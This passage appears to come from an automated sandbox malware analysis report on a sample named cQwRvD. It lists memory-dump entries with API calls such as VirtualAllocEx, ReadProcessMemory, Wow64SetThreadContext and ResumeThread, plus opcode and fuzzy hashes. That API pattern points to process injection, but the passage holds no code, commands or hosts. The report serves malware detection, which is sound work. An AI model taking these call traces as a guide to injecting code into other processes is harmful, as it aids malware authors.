                                                                        • API ID: DrawText
                                                                        • String ID:
                                                                        • API String ID: 2175133113-0
                                                                        • Opcode ID: adf235c3a31405678551fefbcdf8955815e261531bee3b16b4d041bbb26745ae
                                                                        • Instruction ID: 2fa697f639bfecffa6cade50b0631c30dba155f941c59c442add7e883c85a831
                                                                        • Opcode Fuzzy Hash: adf235c3a31405678551fefbcdf8955815e261531bee3b16b4d041bbb26745ae
                                                                        • Instruction Fuzzy Hash: AB21C3B5D013499FDB10CFAAD984ADEBBF5BB48320F14842AE919A7310C7759945CFA0
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07604E86
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1596791122.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_7600000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: a5d14a27740e0b4192fd53e1ec30a3b7186627e1f4acf4798e25c5b725ac2343
                                                                        • Instruction ID: b89e61e4bf9b80c869f0c4900d4543787fbc62616c77eea9bc1c7bdb61b5819d
                                                                        • Opcode Fuzzy Hash: a5d14a27740e0b4192fd53e1ec30a3b7186627e1f4acf4798e25c5b725ac2343
                                                                        • Instruction Fuzzy Hash: 782178B1D003498FDB24DFA9C4857EEBBF4EB49310F54842ED959A7280CB789945CFA0
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0186D797
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1591008174.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1860000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: a9133fa50155c664ae3481082171c811cc62bd78ccb7c78c9c72c5d80825f6d2
                                                                        • Instruction ID: 87a040e1a1154a1547bb58d48e43031c0fbe6d5d159bc92389c00018fa30c115
                                                                        • Opcode Fuzzy Hash: a9133fa50155c664ae3481082171c811cc62bd78ccb7c78c9c72c5d80825f6d2
                                                                        • Instruction Fuzzy Hash: 0A2105B5D002499FDB10CF9AD884ADEBBF8EB48320F14841AE954A3211D378A940CF61
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07604E86
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1596791122.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_7600000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: 349a33992835837ea76d04112d432a31b3be42007374961650938c72184041d1
                                                                        • Instruction ID: ab25abf07079439d8cabefd0d53d1b4010f66ae69990d489a46ae46a2fc38c97
                                                                        • Opcode Fuzzy Hash: 349a33992835837ea76d04112d432a31b3be42007374961650938c72184041d1
                                                                        • Instruction Fuzzy Hash: 7E2138B1D003098FDB24DFAAC4857AEBBF4EF48310F548429D959A7280CB789945CFA4
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07605110
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1596791122.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_7600000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: 024a8b0a779c50e7efbf141fb054db9afa8d8042f09138500028761b09f4e4d5
                                                                        • Instruction ID: c8de5fc0c8a4f44a55b8850085ea76fd59ebce3985aa9295942b322f0303b445
                                                                        • Opcode Fuzzy Hash: 024a8b0a779c50e7efbf141fb054db9afa8d8042f09138500028761b09f4e4d5
                                                                        • Instruction Fuzzy Hash: 502126B5C003499FDB10DFA9C841BDEBBF1FF48310F50842AE959A7280C7399510CB65
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07605110
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1596791122.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_7600000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: fb69c84a1555d39f989522589968fd1d38b28ad7203f4e538b8ecee21f95b308
                                                                        • Instruction ID: 96497f2468a74b6d535f673ce4f5747f3a2a2cca0f70fad2d622dbb90cee1619
                                                                        • Opcode Fuzzy Hash: fb69c84a1555d39f989522589968fd1d38b28ad7203f4e538b8ecee21f95b308
                                                                        • Instruction Fuzzy Hash: BD2116B1C003499FDB14DFAAC841BDEBBF5FF48310F508429E959A7240C7399951CBA4
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0186D797
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1591008174.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1860000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 4ca14fa7119016753509673c354aac59561642ac67f37c4a57881bffd40996ee
                                                                        • Instruction ID: d8e89b4572189e6eee0f3bb2d129c777fcc789d5555ca541b9d28b7691e4fd5d
                                                                        • Opcode Fuzzy Hash: 4ca14fa7119016753509673c354aac59561642ac67f37c4a57881bffd40996ee
                                                                        • Instruction Fuzzy Hash: 4A21E4B5D002499FDB10CFAAD884ADEBFF8EB48320F14841AE954A3350D379A944CF65
                                                                        APIs
                                                                        • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0761EF1A,?,?,?,?,?), ref: 0761EFBF
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1596831225.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_7610000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFromIconResource
                                                                        • String ID:
                                                                        • API String ID: 3668623891-0
                                                                        • Opcode ID: 0c233001593481fe333a2424d653008f884eeea7a2bc0fe2c6aa7c0bbb87b5b2
                                                                        • Instruction ID: 458221a50a92de36da52635e5bee2eb66c8336fa584d0817fe7cee577068c4a6
                                                                        • Opcode Fuzzy Hash: 0c233001593481fe333a2424d653008f884eeea7a2bc0fe2c6aa7c0bbb87b5b2
                                                                        • Instruction Fuzzy Hash: 591159B580034D9FDB10CFAAC848BDEBFF8EB48320F58841AE915A3210C335A954CFA5
                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07604F4E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1596791122.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_7600000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 85474e46db3454f15c99c6a9a166e7d0e7cc24faec7c2049143b2f681791c6a2
                                                                        • Instruction ID: 6aa7a73f1ffa1d1e3e97a237d0bb65651c1c0a59633ff8f74e083468da82538b
                                                                        • Opcode Fuzzy Hash: 85474e46db3454f15c99c6a9a166e7d0e7cc24faec7c2049143b2f681791c6a2
                                                                        • Instruction Fuzzy Hash: B11159B5C003499FDB24DFA9C845BDEBFF5AF48320F14881AE519A7650CB359540CFA4
                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07604F4E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1596791122.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_7600000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 7f5799efb2914e8f5be0b22ba2eed1d2b68bde339ad90ffba5d33fe0742e82c0
                                                                        • Instruction ID: 0f0b5b20f9dc364d7aa31e0eac02c097a6b2296e192b4f2922575ba4793bfb2e
                                                                        • Opcode Fuzzy Hash: 7f5799efb2914e8f5be0b22ba2eed1d2b68bde339ad90ffba5d33fe0742e82c0
                                                                        • Instruction Fuzzy Hash: 781114719003499FDB24DFAAC845BDEBBF5AB88320F148819E929A7250CB759940CBA4
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1596791122.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_7600000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: 96a7e2e0faf8a63161490d9a8155a41686ac1dbb85f6d37f3ca0d197e0f1a69e
                                                                        • Instruction ID: bff012e50ad402e3b5f6cdea9e1afae21023b41f118f23b45b91c0d3bde9472d
                                                                        • Opcode Fuzzy Hash: 96a7e2e0faf8a63161490d9a8155a41686ac1dbb85f6d37f3ca0d197e0f1a69e
                                                                        • Instruction Fuzzy Hash: D21149B1D003498FDB24DFAAC445B9EBBF4EF49214F10882DD519A7640CA795940CB94
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1596791122.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_7600000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: da37f4cb51dcd9e9149b22c51323cf6c8a61cae083158690b5ad7273c655d18c
                                                                        • Instruction ID: ea547f8e24c043e7d44ab7d4b54d97165486ac13c3bc0752410c866e26762b03
                                                                        • Opcode Fuzzy Hash: da37f4cb51dcd9e9149b22c51323cf6c8a61cae083158690b5ad7273c655d18c
                                                                        • Instruction Fuzzy Hash: F71128B1D003498FDB24DFAAC445B9EFBF5EF48324F248429D559A7240CB756941CB94
                                                                        APIs
                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 07608A3D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1596791122.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_7600000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID:
                                                                        • API String ID: 410705778-0
                                                                        • Opcode ID: bb56969f4425e1b6de72225f9b46d8dcfa24a643b30aa33a767b486f32157c8a
                                                                        • Instruction ID: 573560d5ee40188bd5c8a3ca98d6f72fef08b8aee00d8b7fccaa9a373a624c20
                                                                        • Opcode Fuzzy Hash: bb56969f4425e1b6de72225f9b46d8dcfa24a643b30aa33a767b486f32157c8a
                                                                        • Instruction Fuzzy Hash: 9311F2B58003499FDB20DF9AD889BDEBBF8EB48320F108419E919A7640C375A944CFA1
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0186B07E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1591008174.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1860000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: 6b70282f35a823a2ffe3cadc1dba6a4f9ee9c8d3d56edcb494de6e9623335764
                                                                        • Instruction ID: f4a5cd2dfeb1ac2fc44d213a891baf9dfe43aac01eecbba7a874f63e5b4f890a
                                                                        • Opcode Fuzzy Hash: 6b70282f35a823a2ffe3cadc1dba6a4f9ee9c8d3d56edcb494de6e9623335764
                                                                        • Instruction Fuzzy Hash: 9011D2B5D003498FDB24DF9AC444B9EFBF8EB48314F10841AD569A7610D379A645CFA1
                                                                        APIs
                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 07608A3D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1596791122.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_7600000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID:
                                                                        • API String ID: 410705778-0
                                                                        • Opcode ID: 686b4a14de56b255e64ae70e9fbd04bd5203dca698a4506bb07de76ec1c52ac5
                                                                        • Instruction ID: 75b19bc5dd47e580172c802e0d94a6f165f733e33b621db1cf7acb6749e4558c
                                                                        • Opcode Fuzzy Hash: 686b4a14de56b255e64ae70e9fbd04bd5203dca698a4506bb07de76ec1c52ac5
                                                                        • Instruction Fuzzy Hash: FA11E0B58003499FDB10DF9AD885BDEBBF8EB48324F10881AE959A3740C375A944CFA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (q
                                                                        • API String ID: 0-2414175341
                                                                        • Opcode ID: 4a7609ee4c06c96aaf63552fc8398323587fbd3deca9eb6b2cee35122810d9e1
                                                                        • Instruction ID: a4dc92b49b50984628793bde9282f474fea129f2b325ecc396ab851a4b5ac805
                                                                        • Opcode Fuzzy Hash: 4a7609ee4c06c96aaf63552fc8398323587fbd3deca9eb6b2cee35122810d9e1
                                                                        • Instruction Fuzzy Hash: 8761D231A00302DFDB25EB79C858B6EBBB6EF94211F14842DE8069B394DF359C45CB95
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (q
                                                                        • API String ID: 0-2414175341
                                                                        • Opcode ID: 57887c853cb06adbdacb7519401a2ef9b9a936e6e97ae33c272b837cf311418f
                                                                        • Instruction ID: 3c8cece9c5770c7b6141ddbedfe64a8420007fdfa9f3683bf7265afa251bba72
                                                                        • Opcode Fuzzy Hash: 57887c853cb06adbdacb7519401a2ef9b9a936e6e97ae33c272b837cf311418f
                                                                        • Instruction Fuzzy Hash: EC619F75A11209DFCB19DF78D558A6EBBB2FF88312F148169E806EB341EA31E841CB51
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (q
                                                                        • API String ID: 0-2414175341
                                                                        • Opcode ID: d2ba2ce84a908d0b23d4e1d57c7af1057fa95231c5d9498d2c13e9bc4661dae2
                                                                        • Instruction ID: 6991b437d8bc89a60db3a02b23950e926e7b08bc882f3da4512c36aec684409b
                                                                        • Opcode Fuzzy Hash: d2ba2ce84a908d0b23d4e1d57c7af1057fa95231c5d9498d2c13e9bc4661dae2
                                                                        • Instruction Fuzzy Hash: 2C31BFB1E043598FDB14DFA9D844BAEBBF9EB89210F14842EE809E7340D7749D01CBA5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8q
                                                                        • API String ID: 0-4083045702
                                                                        • Opcode ID: 2031627365f23fceeafc85ecb7183e9fafab65274c5386e9a902d55772335dfb
                                                                        • Instruction ID: 240892559b391178954e05039eeb755616bc392a2277d5a8db493788f087b9e3
                                                                        • Opcode Fuzzy Hash: 2031627365f23fceeafc85ecb7183e9fafab65274c5386e9a902d55772335dfb
                                                                        • Instruction Fuzzy Hash: 254117B5E04209DBCB04EFA9E884AFEBFF6FB89311F108429E816A7254CB755945CF50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8q
                                                                        • API String ID: 0-4083045702
                                                                        • Opcode ID: 5bf7402b9bb414b13ec31bfa127d851ff892225a04ddd83139f66287efd16488
                                                                        • Instruction ID: 069ff5a044e8dd26be332beb90972dbc021ebc07f6c08daaff6dbe0ac4ba3520
                                                                        • Opcode Fuzzy Hash: 5bf7402b9bb414b13ec31bfa127d851ff892225a04ddd83139f66287efd16488
                                                                        • Instruction Fuzzy Hash: 004175B5E0420ADFCB05EFA9D8846BEBFF6FB8A301F108429E406A7254C7754942CF60
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Teq
                                                                        • API String ID: 0-1098410595
                                                                        • Opcode ID: cfb6263b9ca7226bf1bf933a461aa722a28b9ccc82e40e5f8a61ca942629cc07
                                                                        • Instruction ID: 9e9a5ac1001acf5625f534b7110e6bc25c12a5124eac4a4167eedd6355e7cfc7
                                                                        • Opcode Fuzzy Hash: cfb6263b9ca7226bf1bf933a461aa722a28b9ccc82e40e5f8a61ca942629cc07
                                                                        • Instruction Fuzzy Hash: 0C3108B9E04248CBDB14DFFAC9456EEBBB6BF89301F14902AD419AB358DB745906CF40
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Teq
                                                                        • API String ID: 0-1098410595
                                                                        • Opcode ID: 46efc33ebf7f836822cd2e7cadf3e484df3b47f9cfc0e98959421e983a3a37df
                                                                        • Instruction ID: aa054a7d4377bd6b3e1c216e602c37d270c001de5e7ffccc06b73f10e45dfb7c
                                                                        • Opcode Fuzzy Hash: 46efc33ebf7f836822cd2e7cadf3e484df3b47f9cfc0e98959421e983a3a37df
                                                                        • Instruction Fuzzy Hash: FD31C174E04209CFDB08DFA9C484AEDBBB2FF48301F249029E919AB365D7309945CB50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Teq
                                                                        • API String ID: 0-1098410595
                                                                        • Opcode ID: 522f48f706621b121600c982f4d97619c3817d1e82ec9f1b001f1691b653f8bc
                                                                        • Instruction ID: b616a23d49223787401ca23a127d7b0d59f2b0c0ae42e489858c1ad23bb6023a
                                                                        • Opcode Fuzzy Hash: 522f48f706621b121600c982f4d97619c3817d1e82ec9f1b001f1691b653f8bc
                                                                        • Instruction Fuzzy Hash: 0D31D4B4E04218CBDB18DFEAC8446EEFBB6BF89301F14902AD419AB358DB705946CB50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LRq
                                                                        • API String ID: 0-3187445251
                                                                        • Opcode ID: 9ac24580462b02607b0a92e2989c164308b500d6481d4e864cb5c3c56e5df571
                                                                        • Instruction ID: 2914c01d0123216bebcfefa861f980c5a11125c73d34369de558d564eaa14c60
                                                                        • Opcode Fuzzy Hash: 9ac24580462b02607b0a92e2989c164308b500d6481d4e864cb5c3c56e5df571
                                                                        • Instruction Fuzzy Hash: F03118B5E15218CFDB04EFAAC8456AEBBF6BF89301F54802AD809B7359DB345906CF50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LRq
                                                                        • API String ID: 0-3187445251
                                                                        • Opcode ID: fd92fed6e1c495bf4308b68c7f1c0d8876f380199d803cbaf49d33da3c5b7555
                                                                        • Instruction ID: e42d321e8e414aa0bde14d5a32a0f617e0998db8bd4d31df3ec0a4cb5a9bbe91
                                                                        • Opcode Fuzzy Hash: fd92fed6e1c495bf4308b68c7f1c0d8876f380199d803cbaf49d33da3c5b7555
                                                                        • Instruction Fuzzy Hash: 3431D7B5E14218CBDB08DFAAC8446AEBBF6FF89301F549029D809A7358DB345906CF50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LRq
                                                                        • API String ID: 0-3187445251
                                                                        • Opcode ID: 3cf0f8058ead02d645e165c3b0a1d199889b2b208c150c2e6a74d3357a376e47
                                                                        • Instruction ID: 80575a4672eaa4f028406bc1a7583d25ad6e25ff3cda08f7008c2217a1f4ac35
                                                                        • Opcode Fuzzy Hash: 3cf0f8058ead02d645e165c3b0a1d199889b2b208c150c2e6a74d3357a376e47
                                                                        • Instruction Fuzzy Hash: 5711D4B5E19258CFCB00DFA9D4909ADBBF2FB99301F505069E809A7385DB349D05CF10
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Teq
                                                                        • API String ID: 0-1098410595
                                                                        • Opcode ID: 76a3ee1a7050c6a8b61ec6efac47c0a7ae73b90a9d8b4b7ad467e3591f0d6c66
                                                                        • Instruction ID: 78c831e9f468cc94adfb4c98dd7abcfe4f94d9472021306a2470426ae1d25237
                                                                        • Opcode Fuzzy Hash: 76a3ee1a7050c6a8b61ec6efac47c0a7ae73b90a9d8b4b7ad467e3591f0d6c66
                                                                        • Instruction Fuzzy Hash: 15118075E00209DFDB04DFE8D4849ADFBB2FF88310F14812AE919AB364C6319955CF50
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7075c54213cbb2e1b3479848571fa89183d25b98f95558dccb5d31e231d7d5a2
                                                                        • Instruction ID: b53735d14be6e5cd21ad0d4e2d4c16d8ec508a8bea06307e0bbcb17a24968827
                                                                        • Opcode Fuzzy Hash: 7075c54213cbb2e1b3479848571fa89183d25b98f95558dccb5d31e231d7d5a2
                                                                        • Instruction Fuzzy Hash: 89226131A0070ADFCF15EF64C440ADDBBB1FF85300F50869AE949AB251EB70EA85CB91
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cafefec7a16d7c108e405864bb816e58e192e89ca92d7ed39928c6e739c011f8
                                                                        • Instruction ID: 1cb3e2c7693798a87ad87ff4210aeb7a168f389d5fb17068fe916f42c40ca5ef
                                                                        • Opcode Fuzzy Hash: cafefec7a16d7c108e405864bb816e58e192e89ca92d7ed39928c6e739c011f8
                                                                        • Instruction Fuzzy Hash: 2BD1C2B1F00206CFCB15BF78C9486AEBFB1FF54202F6544A9D446A7295E730C861CB99
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c9808b9494ff594f933a229b1521ca7f16edbccf60d757cc5757c12dfcbf2236
                                                                        • Instruction ID: 91f462f897ea63fb1c78b631478808f1e631efe8acc757c8c724ea171697f342
                                                                        • Opcode Fuzzy Hash: c9808b9494ff594f933a229b1521ca7f16edbccf60d757cc5757c12dfcbf2236
                                                                        • Instruction Fuzzy Hash: 189137B9E15209CFCB04EFA9D444AEEBBF6FB89341F90902AD815A7385DB349941CF50
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3befc1692ad7b9851451529b79ed787f15e0c150d2acb0ebfe7ced6189287d98
                                                                        • Instruction ID: 6eafcce64a4b13a1b2206c8c4a0f6691de20ccf6edd9c42f40d83d949a389577
                                                                        • Opcode Fuzzy Hash: 3befc1692ad7b9851451529b79ed787f15e0c150d2acb0ebfe7ced6189287d98
                                                                        • Instruction Fuzzy Hash: 88A1B475911619CFCB10EF68C844A99FBB1FF49314F05C699E949BB311EB30AA89CF90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: daf2b291d65496568c2254408702c618a0eb5a628273fbb937a2cb206a2b7830
                                                                        • Instruction ID: 333a33c3c4dd81881b9d2318e9e2829c7c056f9ad2216c404adf645c336c5ac3
                                                                        • Opcode Fuzzy Hash: daf2b291d65496568c2254408702c618a0eb5a628273fbb937a2cb206a2b7830
                                                                        • Instruction Fuzzy Hash: 01915634A00354CFCB19EFB8C988A99BBB2FF45305F1484A9D8089F36ADB71E945CB40
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
